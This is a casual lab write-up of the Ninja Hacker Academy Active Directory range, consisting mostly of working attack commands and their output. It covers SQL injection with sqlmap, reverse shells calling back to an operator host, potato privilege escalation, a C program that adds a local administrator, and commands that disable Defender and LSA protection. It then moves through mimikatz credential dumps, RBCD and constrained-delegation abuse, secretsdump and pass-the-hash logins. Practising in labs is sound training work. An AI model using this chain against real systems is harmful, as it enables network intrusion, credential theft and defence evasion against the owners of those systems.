NHA Lab Write-Up
- This is not a pro write-up. Just me casually sharing my steps. Enjoy!
Lab Network Info:
- WEB → 192.168.56.21 (the web server and entry point)
- SQL → 192.168.56.22 (SQL Server, reachable via SQLi)
- SHARE → 192.168.56.23 (a file server)
- DC-AC → 192.168.56.20 (Domain Controller for academy.ninja.lan)
- DC-VIL → 192.168.56.10 (Domain Controller for ninja.hack)
The lab has two domains:
• academy.ninja.lan
• ninja.hack
All machines had Defender enabled, and no brute-force was needed.
Starting Point
- Entry point:
WEB (srv-1)→192.168.56.21 - Found a web page showing a student list.
- The URL had a vulnerable parameter:
http://192.168.56.21/Students?SearchString=test&orderBy=Team
- The
orderByparameter was vulnerable to SQL injection.
sqlmap -u 'http://192.168.56.21/Students?SearchString=444&orderBy=Team' --batch --level=3 --risk=2 --ignore-code=401 --tamper=between,randomcase --os-shell
SQLMap confirmed it’s MSSQL, and the user is:
nt authority\network service
But the real surprise?
The SQL commands were executing on another machine → SQL at 192.168.56.22
Shell on SQL & PrivEsc
I launched a reverse shell using nc.exe, bypassed AMSI, and found that I had:
using amsi.fail
whoami /priv
SeImpersonatePrivilege Impersonate a client after authentication Enabled
That’s all I needed
Used BadPotato to impersonate SYSTEM and executed adduser.exe to:
iex ([System.Text.Encoding]::ASCII.GetString((iwr “http://192.168.56.1/Invoke-BadPotato.ps1" -UseBasicParsing).Content))
Invoke-BadPotato -command “C:\users\public\adduser.exe”
- Create a user:
puck - Add him to the
Administratorsgroup
You need to compile it to exe
$ apt install mingw-w64
$ x86_64-w64-mingw32-g++ adduser.c -o adduser.exe
$ file adduser.exe
adduser.exe: PE32+ executable for MS Windows 5.02 (console), x86-64, 18 sections
$ cat adduser.c
#include <stdlib.h>
int main () {
int i;
i = system ("net user puck Password123@ /add");
i = system ("net localgroup administrators puck /add");
return 0;
}
.
Creating a C File in Visual Studio
To create and work with a C file in Visual Studio, follow these steps:
Example
Open Visual Studio.
Go to File > New > Project or press Ctrl + Shift + N.
Select C++ from the project templates and choose Console App.
Name your project and click Create.
In the Solution Explorer, delete the default .cpp file (if present).
Right-click on the Source Files folder, select Add > New Item, and choose C++ File (.cpp).
Rename the file with a .c extension (e.g., adduser.c) to indicate it's a C file.
Write your C code in the newly created file.
#include <stdlib.h>
int main () {
int i;
i = system ("net user puck Password123@ /add");
i = system ("net localgroup administrators puck /add");
return 0;
}
.
Now I fully owned SQL.
I disabled Defender for easier post-exploitation, grabbed two flags, and moved on
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Lsa” /v “RunAsPPL” /t REG_DWORD /d 0 /f
—————-
other interesting finding on sql server
PS C:\setup\mssql> cat sql_conf.ini cat sql_conf.ini ;SQL Server Configuration File <snip> SQLSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE" SAPWD="sa_P@ssw0rd!N1nJ4hackaDemy"
verify creds
proxychains nxc mssql 192.168.56.22 -u sa -p 'sa_P@ssw0rd!N1nJ4hackaDemy' --local-auth -x 'type c:\flag.txt'
$ proxychains nxc mssql 192.168.56.22 -u sa -p 'sa_P@ssw0rd!N1nJ4hackaDemy' --local-auth MSSQL 192.168.56.22 1433 SQL [*] Windows 10 / Server 2019 Build 17763 (2019 RTM 15.0.2000) (name:SQL) (domain:academy.ninja.lan) (EncryptionReq:False) MSSQL 192.168.56.22 1433 SQL [+] SQL\sa:sa_P@ssw0rd!N1nJ4hackaDemy (Pwn3d!)
other nice
proxychains nxc mssql 192.168.56.22 -u sa -p 'sa_P@ssw0rd!N1nJ4hackaDemy' --local-auth -x 'c:\\programdata\\rcat_178.224.123.45_8888.exe'
.
$ rlwrap nc -nlvp 8888 listening on [any] 8888 ... connect to [192.168.1.41] from (UNKNOWN) [64.23.111.54] 55422 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami nt authority\network service PS C:\Windows\system32> hostname hostname sql
.
using printspoofer64.exe to escalate from nt authority\network service to nt authority\system
.\printspoofer64.exe -c c:\programdata\rcat_178.224.123.45_8888.exe
PS C:\programdata> hostname hostname sql PS C:\programdata> whoami whoami nt authority\network service PS C:\programdata> .\printspoofer64.exe -c c:\programdata\rcat_178.224.123.45_8888.exe .\printspoofer64.exe -c c:\programdata\rcat_178.224.123.45_8888.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK PS C:\programdata>
.
$ rlwrap nc -nlvp 8888 listening on [any] 8888 ... connect to [192.168.1.41] from (UNKNOWN) [64.23.111.54] 61180 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami nt authority\system
.
from session as nt-authority\system on sql
[127.0.0.1] sliver (SECONDARY_FEDORA) > execute -o whoami /groups
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
[127.0.0.1] sliver (SECONDARY_FEDORA) > mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords"
[*] Successfully executed mimikatz
[*] Got output:
.#####. mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
588 {0;000003e7} 1 D 18978 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 77800641 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
* Thread Token : {0;000003e7} 1 D 77993466 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 44422 (00000000:0000ad86)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 8/21/2026 6:14:00 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : SQL$
* Domain : ACADEMY
* NTLM : d7fa6321234fdc8f64ece061cf866570
* SHA1 : 44bfe57cec56d0253bcf1367cb22b050e09fd151
* DPAPI : 44bfe57cec56d0253bcf1367cb22b050
tspkg :
wdigest :
* Username : SQL$
* Domain : ACADEMY
* Password : (null)
kerberos :
* Username : SQL$
* Domain : academy.ninja.lan
* Password : F1<PmZ8X*9^pYPx\\na=?hvR3KY.cQ=tRB,=f>8Bln!Ve=Bos\);b%=;KAauSj G'9ro.&:,eQH?32 gVgTD:YRpwgswfYr]F=E[4$1@hS`e`,=1D1FpI=KP
ssp :
credman :
<snip>
[127.0.0.1] sliver (SECONDARY_FEDORA) > SOCKS5 start
.
$ proxychains impacket-getTGT 'academy.ninja.lan/sql\$' -hashes :d7fa6321234fdc8f64ece061cf866570 [*] Saving ticket in sql\$.ccache
proxychains bloodhound-ce-python --zip -c All -k -no-pass -u 'sql$' -d academy.ninja.lan -ns 192.168.56.20
.
BloodHound = Goldmine
sudo docker-compose -f /opt/bloodhoundce/docker-compose.yml up
I dumped using SharpHound and uploaded BloodHound data and found something interesting:
c:\ProgramData>PsExec64.exe -s -i powershell.exe PsExec v2.43 - Execute processes remotely Copyright (C) 2001-2023 Mark Russinovich Sysinternals - www.sysinternals.com in new window PS C:\programdata> .\SharpHound.exe 2026-08-18T06:04:31.1717758-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound 2026-08-18T06:04:31.5753027-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2026-08-18T06:04:31.6425470-07:00|INFORMATION|Initializing SharpHound at 6:04 AM on 8/18/2026 2026-08-18T06:04:32.2468801-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for academy.ninja.lan : dc-ac.academy.ninja.lan 2026-08-18T06:04:32.3566566-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2026-08-18T06:04:32.9365569-07:00|INFORMATION|Beginning LDAP search for academy.ninja.lan 2026-08-18T06:04:33.0746427-07:00|INFORMATION|Producer has finished, closing LDAP channel 2026-08-18T06:04:33.0746427-07:00|INFORMATION|LDAP channel closed, waiting for consumers 2026-08-18T06:05:03.0149871-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM 2026-08-18T06:05:18.0141819-07:00|INFORMATION|Consumers finished, closing output channel 2026-08-18T06:05:18.1547467-07:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2026-08-18T06:05:18.5924516-07:00|INFORMATION|Status: 126 objects finished (+126 2.8)/s -- Using 43 MB RAM 2026-08-18T06:05:18.5924516-07:00|INFORMATION|Enumeration finished in 00:00:45.6834456 2026-08-18T06:05:18.8268961-07:00|INFORMATION|Saving cache with stats: 85 ID to type mappings. 88 name to SID mappings. 1 machine sid mappings. 2 sid to domain mappings. 1 global catalog mappings. 2026-08-18T06:05:18.8596152-07:00|INFORMATION|SharpHound Enumeration Completed at 6:05 AM on 8/18/2026! Happy Graphing! PS C:\programdata>
.
SQL has GenericAll rights on the Computers container

Steps:
- Dumped NTLM hash of
$sqlusing mimikatz
iex (iwr http://192.168.56.1/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : SQL$
Domain : ACADEMY
Logon Server : (null)
Logon Time : 8/18/2026 1:22:24 AM
SID : S-1-5-18
* Username : sql$
* Domain : ACADEMY.NINJA.LAN
* Password : (null)
* Key List :
aes256_hmac bf13e5519bf0f4640c12ad6c4dc2a0977ddf4c72d39df1f7f84b8e97f4d43b9f
rc4_hmac_nt d7fa6321234fdc8f64ece061cf866570
rc4_hmac_old d7fa6321234fdc8f64ece061cf866570
rc4_md4 d7fa6321234fdc8f64ece061cf866570
rc4_hmac_nt_exp d7fa6321234fdc8f64ece061cf866570
rc4_hmac_old_exp d7fa6321234fdc8f64ece061cf866570
.
2. Used addcomputer.py to create a new computer
impacket-addcomputer academy.ninja.lan/sql$ -hashes :d7fa6321234fdc8f64ece061cf866570 -computer-name attackerPC$ -computer-pass 'P@ssw0rd123!'
$ impacket-addcomputer academy.ninja.lan/sql$ -hashes :d7fa6321234fdc8f64ece061cf866570 -computer-name attackerPC$ -computer-pass 'P@ssw0rd123!' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Successfully added machine account attackerPC$ with password P@ssw0rd123!.
.
3. Used dacledit.py to give full control to my new computer
impacket-dacledit -action write -rights FullControl -inheritance -principal attackerPC$\
-target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" -hashes :d7fa6321234fdc8f64ece061cf866570 academy.ninja.lan/SQL$'
$ impacket-dacledit -action write -rights FullControl -inheritance -principal attackerPC$ -target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" -hashes :d7fa6321234fdc8f64ece061cf866570 academy.ninja.lan/SQL$ Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20260818-151710.bak [*] DACL modified successfully!
extra Used dacledit.py to give full control to SQL$
proxychains impacket-dacledit -action write -rights FullControl -inheritance -principal SQL$ -target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" -hashes :d7fa6321234fdc8f64ece061cf866570 academy.ninja.lan/SQL$P
.
proxychains impacket-dacledit -action “write” -principal SQL$ -target-dn “CN=Computers,DC=academy,DC=ninja,DC=lan” “academy.ninja.lan”/”SQL$” -hashes :d7fa6321234fdc8f64ece061cf866570 -inheritance -dc-ip 192.168.56.20
$ proxychains impacket-dacledit -action "write" -principal SQL$ -target-dn "CN=Computers,DC=academy,DC=ninja,DC=lan" "academy.ninja.lan"/"SQL$" -hashes :d7fa6321234fdc8f64ece061cf866570 -inheritance -dc-ip 192.168.56.20 [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU /usr/share/doc/python3-impacket/examples/dacledit.py:390: DeprecationWarning: codecs.open() is deprecated. Use open() instead. with codecs.open(self.filename, 'w', 'utf-8') as outfile: [*] DACL backed up to dacledit-20260828-202829.bak [*] DACL modified successfully!
.
result

attacker machine ( and sql.academy.ninja.lan ) have genericall on web now
4. adding other computer
impacket-addcomputer -method SAMR -computer-name PUCKPC$ -computer-pass P@ssw0rd123! -dc-host 192.168.56.20 -domain-netbios ACADEMY ACADEMY/attackerPC$:P@ssw0rd123!
$ impacket-addcomputer -method SAMR -computer-name PUCKPC$ -computer-pass P@ssw0rd123! -dc-host 192.168.56.20 -domain-netbios ACADEMY ACADEMY/attackerPC$:P@ssw0rd123! Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Successfully added machine account PUCKPC$ with password P@ssw0rd123!.
.
5. Abused RBCD to target WEB
impacket-rbcd -delegate-from 'PUCKPC$' -delegate-to 'WEB$' -action 'write' 'ACADEMY.NINJA.LAN/attackerPC$:P@ssw0rd123!'
$ impacket-rbcd -delegate-from 'PUCKPC$' -delegate-to 'WEB$' -action 'write' 'ACADEMY.NINJA.LAN/attackerPC$:P@ssw0rd123!' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] PUCKPC$ can now impersonate users on WEB$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] PUCKPC$ (S-1-5-21-1689894000-2828720023-2655755433-1138)
.
6. Get a TGT, then then a service ticket to impersonate administrator
impacket-getTGT -aesKey 'bf13e5519bf0f4640c12ad6c4dc2a0977ddf4c72d39df1f7f84b8e97f4d43b9f' 'ACADEMY.NINJA.LAN/SQL$' -dc-ip 192.168.56.20
$ impacket-getTGT -aesKey 'bf13e5519bf0f4640c12ad6c4dc2a0977ddf4c72d39df1f7f84b8e97f4d43b9f' 'ACADEMY.NINJA.LAN/SQL$' -dc-ip 192.168.56.20
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in SQL$.ccache
-> wrong
use
$ impacket-getTGT 'ACADEMY.NINJA.LAN/PUCKPC$:P@ssw0rd123!' -dc-ip 192.168.56.20
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in PUCKPC$.ccache
$ export KRB5CCNAME=PUCKPC\$.ccache
$ klist
Ticket cache: FILE:PUCKPC$.ccache
Default principal: PUCKPC$@ACADEMY.NINJA.LAN
Valid starting Expires Service principal
08/18/2026 15:36:30 08/19/2026 01:36:30 krbtgt/ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN
renew until 08/19/2026 15:36:30
$ impacket-getST -spn cifs/WEB.ACADEMY.NINJA.LAN -impersonate administrator 'ACADEMY.NINJA.LAN/PUCKPC$:P@ssw0rd123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN.ccache
....
7. Used impacket-secretsdump to dump everything from WEB
export KRB5CCNAME=administrator@cifs_WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN.ccache impacket-secretsdump -no-pass -k administrator@WEB.ACADEMY.NINJA.LAN
$ klist
Ticket cache: FILE:administrator@cifs_WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN.ccache
Default principal: administrator@ACADEMY.NINJA.LAN
Valid starting Expires Service principal
08/18/2026 15:37:12 08/19/2026 01:36:30 cifs/WEB.ACADEMY.NINJA.LAN@ACADEMY.NINJA.LAN
renew until 08/19/2026 15:36:30
impacket-secretsdump -no-pass -k administrator@WEB.ACADEMY.NINJA.LAN
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x3f6fe96ab321aca0000d59ed0dfd4bcc
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0c532fcf2046010cb8d38eedf5e45312:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6d587fe93bb333e51b07759bc056d261:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
ACADEMY\WEB$:plain_password_hex:79004a006700690078007900220063004400570060003b0025003d00470067007a005b002b004e005c002d005700780050002800550031006b00250048002f0050005f005c004b004200280078006800760060005c004c0074002b006500220068006c002600770030006600280047002e00720069004300620061005f007100580075003b002600290042006f004d003900210043005f004f004b002a0058003c004e00690063003200770043005c002a003400340021004a007400720065002a002b00630022005d0070002b00650061003400480063003e00310021006d006e002d002d006b005400200058005900
ACADEMY\WEB$:aad3b435b51404eeaad3b435b51404ee:9c64f8b96c129d62f67cf7cd6bdf88d0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x30f91d49da6d7bcd822a8ef5b6a69377df9e3d7e
dpapi_userkey:0x22d66027e0828bdd2822a23fa1506dce814516e1
[*] NL$KM
0000 6A 2F A7 33 55 6E B4 2D 26 EA 27 3B 9B C0 A2 5C j/.3Un.-&.';...\
0010 D6 5C CC CC 8C 6A 7B 82 D1 83 BC 0B 4F 1A 89 42 .\...j{.....O..B
0020 66 4F 98 75 84 97 FF AE F4 C4 7A 60 0D 6A 41 DA fO.u......z`.jA.
0030 75 B3 F0 BD 65 28 BD 52 06 8C 06 AA DB BB A1 9A u...e(.R........
NL$KM:6a2fa733556eb42d26ea273b9bc0a25cd65ccccc8c6a7b82d183bc0b4f1a8942664f98758497ffaef4c47a600d6a41da75b3f0bd6528bd52068c06aadbbba19a
[*] Cleaning up...
[*] Stopping service RemoteRegistry
.
verify found creds
nxc smb 192.168.56.21 -u '.\administrator' -H 'aad3b435b51404eeaad3b435b51404ee:0c532fcf2046010cb8d38eedf5e45312'
$ nxc smb 192.168.56.21 -u '.\administrator' -H 'aad3b435b51404eeaad3b435b51404ee:0c532fcf2046010cb8d38eedf5e45312' SMB 192.168.56.21 445 WEB [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB) (domain:academy.ninja.lan) (signing:False) (SMBv1:None) SMB 192.168.56.21 445 WEB [+] .\administrator:0c532fcf2046010cb8d38eedf5e45312 (Pwn3d!)
.
evil-winrm -i WEB.ACADEMY.NINJA.LAN -u Administrator -H '0c532fcf2046010cb8d38eedf5e45312'
iex (iwr http://192.168.56.1/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'
Good 2 only download iwr -Uri "http://url/script.ps1" -OutFile "bestandsnaam.ps1"
iex (iwr http://192.168.56.1/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'
files on disk suggest we are running in a sandbox. Caution!.
C:\windows\System32\Drivers\VBoxMouse.sys
C:\windows\System32\Drivers\VBoxGuest.sys
C:\windows\System32\Drivers\VBoxSF.sys
C:\windows\System32\vboxhook.dll
C:\windows\System32\vboxmrxnp.dll
C:\windows\System32\vboxservice.exe
C:\windows\System32\vboxtray.exe
C:\windows\System32\VBoxControl.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 23 2024 17:47:47
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::ekeys
Authentication Id : 0 ; 92728976 (00000000:0586ee90)
Session : NetworkCleartext from 0
User Name : frank
Domain : ACADEMY
Logon Server : DC-AC
Logon Time : 8/18/2026 7:09:55 AM
SID : S-1-5-21-1689894000-2828720023-2655755433-1132
* Username : frank
* Domain : ACADEMY.NINJA.LAN
* Password : (null)
* Key List :
aes256_hmac a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac
rc4_hmac_nt d4fad93561dee253398d5891e991a6fb
rc4_hmac_old d4fad93561dee253398d5891e991a6fb
rc4_md4 d4fad93561dee253398d5891e991a6fb
rc4_hmac_nt_exp d4fad93561dee253398d5891e991a6fb
rc4_hmac_old_exp d4fad93561dee253398d5891e991a6fb
<snip>
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEB$
Domain : ACADEMY
Logon Server : (null)
Logon Time : 8/14/2026 5:35:06 PM
SID : S-1-5-18
* Username : web$
* Domain : ACADEMY.NINJA.LAN
* Password : (null)
* Key List :
aes256_hmac 9b24d3628174c8eb291229e0b6e14b03754235902a3d969447251ae2794ee4e7
rc4_hmac_nt 9c64f8b96c129d62f67cf7cd6bdf88d0
rc4_hmac_old 9c64f8b96c129d62f67cf7cd6bdf88d0
rc4_md4 9c64f8b96c129d62f67cf7cd6bdf88d0
rc4_hmac_nt_exp 9c64f8b96c129d62f67cf7cd6bdf88d0
rc4_hmac_old_exp 9c64f8b96c129d62f67cf7cd6bdf88d0
....
.
verify creds
proxychains nxc smb 192.168.56.21 -u frank -H 'd4fad93561dee253398d5891e991a6fb'
$ proxychains nxc smb 192.168.56.21 -u frank -H 'd4fad93561dee253398d5891e991a6fb' SMB 192.168.56.21 445 WEB [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB) (domain:academy.ninja.lan) (signing:False) (SMBv1:False) SMB 192.168.56.21 445 WEB [+] academy.ninja.lan\frank:d4fad93561dee253398d5891e991a6fb (Pwn3d!)
.
$ proxychains -q evil-winrm -i SQL.ACADEMY.NINJA.LAN -u frank -H 'd4fad93561dee253398d5891e991a6fb'
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\frank\Documents> whoami
academy\frank
.

.
just for fun
$ proxychains impacket-getTGT 'academy.ninja.lan/frank' -hashes :d4fad93561dee253398d5891e991a6fb
[*] Saving ticket in frank.ccache
export KRB5CCNAME=frank.ccache
-----
all abuse got it from bloodhound
then turn off defender
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Lsa” /v “RunAsPPL” /t REG_DWORD /d 0 /f
and dump Lsass using netexec
netexec smb 192.168.56.21 -u administrator -H '0c532fcf2046010cb8d38eedf5e45312' —local-auth -M lsassy
got frank hashes !
ACADEMY\frank d4fad93561dee253398d5891e991a6fb
Flag captured
.
┌──(bolke㉿hacky)-[~/htb/goad-nha]
└─$ proxychains -q evil-winrm -i web.ACADEMY.NINJA.LAN -u frank -H 'd4fad93561dee253398d5891e991a6fb'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\frank\Documents> cd c:\programdata
*Evil-WinRM* PS C:\programdata> . .\invoke-mimi.ps1
*Evil-WinRM* PS C:\programdata> Invoke-Mimi -Command '"sekurlsa::ekeys"'
The following files on disk suggest we are running in a sandbox. Caution!.
C:\windows\System32\Drivers\VBoxMouse.sys
C:\windows\System32\Drivers\VBoxGuest.sys
C:\windows\System32\Drivers\VBoxSF.sys
C:\windows\System32\vboxhook.dll
C:\windows\System32\vboxmrxnp.dll
C:\windows\System32\vboxservice.exe
C:\windows\System32\vboxtray.exe
C:\windows\System32\VBoxControl.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 23 2024 17:47:47
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::ekeys
Authentication Id : 0 ; 2373378 (00000000:00243702)
Session : NetworkCleartext from 0
User Name : frank
Domain : ACADEMY
Logon Server : DC-AC
Logon Time : 8/21/2026 7:46:55 AM
SID : S-1-5-21-1689894000-2828720023-2655755433-1132
* Username : frank
* Domain : ACADEMY.NINJA.LAN
* Password : (null)
* Key List :
aes256_hmac a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac
rc4_hmac_nt d4fad93561dee253398d5891e991a6fb
<snip>
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEB$
Domain : ACADEMY
Logon Server : (null)
Logon Time : 8/21/2026 6:15:58 AM
SID : S-1-5-20
* Username : web$
* Domain : ACADEMY.NINJA.LAN
* Password : (null)
* Key List :
aes256_hmac 9b24d3628174c8eb291229e0b6e14b03754235902a3d969447251ae2794ee4e7
rc4_hmac_nt 9c64f8b96c129d62f67cf7cd6bdf88d0
<snip>
*Evil-WinRM* PS C:\programdata>
.
Moving to SHARE
From BloodHound again:
frank@academy.ninja.lan has constrained delegation rights on SHARE.

.
$ impacket-findDelegation -dc-ip 'dc-ac.academy.ninja.lan' "academy.ninja.lan"/"frank" -hashes :d4fad93561dee253398d5891e991a6fb Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies AccountName AccountType DelegationType DelegationRightsTo SPN Exists ----------- ----------- ---------------------------------- -------------------------------- ---------- DC-AC$ Computer Unconstrained N/A Yes PUCKPC$ Computer Resource-Based Constrained WEB$ No frank Person Constrained w/ Protocol Transition eventlog/share No frank Person Constrained w/ Protocol Transition eventlog/share.academy.ninja.lan Yes
.
This is interesting just like the GenericAll on the container, I have not yet this specific Constrained Delegation with Protocol Transition on the eventlog/share. However this works basically the same as any Constrained Delegation we can leverage the msdsspn value; which in this case is the eventlog/share and specify a altservice service. So let’s try to create a ticket but this time with CIFS as altservice.
it should work like below, but not for me 🙁
link : https://crypt0ace.github.io/posts/NHA-Part-3/
link2 minute28 : 7MS #697: Pwning Ninja Hacker Academy – Part 4 – YouTube
┌──(bolke㉿kali)-[~/goad-nha] └─$ impacket-getST -spn 'eventlog/share.academy.ninja.lan' -altservice 'çifs/share' -impersonate Administrator -dc-ip 'dc-ac.academy.ninja.lan' "academy.ninja.lan"/"frank" -hashes :d4fad93561dee253398d5891e991a6fb Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
.
-hashes :<NTLM_HASH>), the tool defaults to requesting an RC4 ticket. If the KDC has RC4 disabled, it throws KDC_ERR_ETYPE_NOSUPP.- Solution: Extract the AES256 key for the account instead of the NTLM hash, and use the
-aesKeyflag in Impacket.
- Command Example:
python3 getST.py -aesKey <AES_256_KEY> -impersonate Administrator -spn HTTP/target.domain.local domain.local/user.
┌──(bolke㉿kali)-[~/htb/goad-nha] └─$ impacket-getST -spn 'eventlog/share' -altservice 'cifs' -impersonate 'Administrator' -aesKey a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac 'academy.ninja.lan/frank' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Changing service from eventlog/share@ACADEMY.NINJA.LAN to cifs/share@ACADEMY.NINJA.LAN [*] Saving ticket in Administrator@cifs_share@ACADEMY.NINJA.LAN.ccache
.
when error : Impersonating Administrator [*] Requesting S4U2self [-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
- Solution: Sync your attack box clock with the target Domain Controller using
ntpdateorrdate:bashsudo ntpdate <DC_IP>
and now I am able to get access to the share machine as Administrator.
KRB5CCNAME=administrator.NINJA.LAN.ccache
impacket-smbexec share -k -no-pass
┌──(bolke㉿kali)-[~] └─$ impacket-smbexec share -k -no-pass Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32>whoami nt authority\system C:\Windows\system32>hostname share C:\Windows\system32>
.
impacket-secretsdump @share -k -no-pass -target-ip 192.168.56.23evil-winrm -i share -u ".\Administrator" -H "7849822ea2995bac91cc0a20c6af1fbe"impacket-smbexec administrator@share -hashes :7849822ea2995bac91cc0a20c6af1fbeWhile dumping the hashes from SHARE to get the machine account hash, I also encounter the password of Frank’s account. Which is Il0ve!R4men_<3 .
$ impacket-smbexec share -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
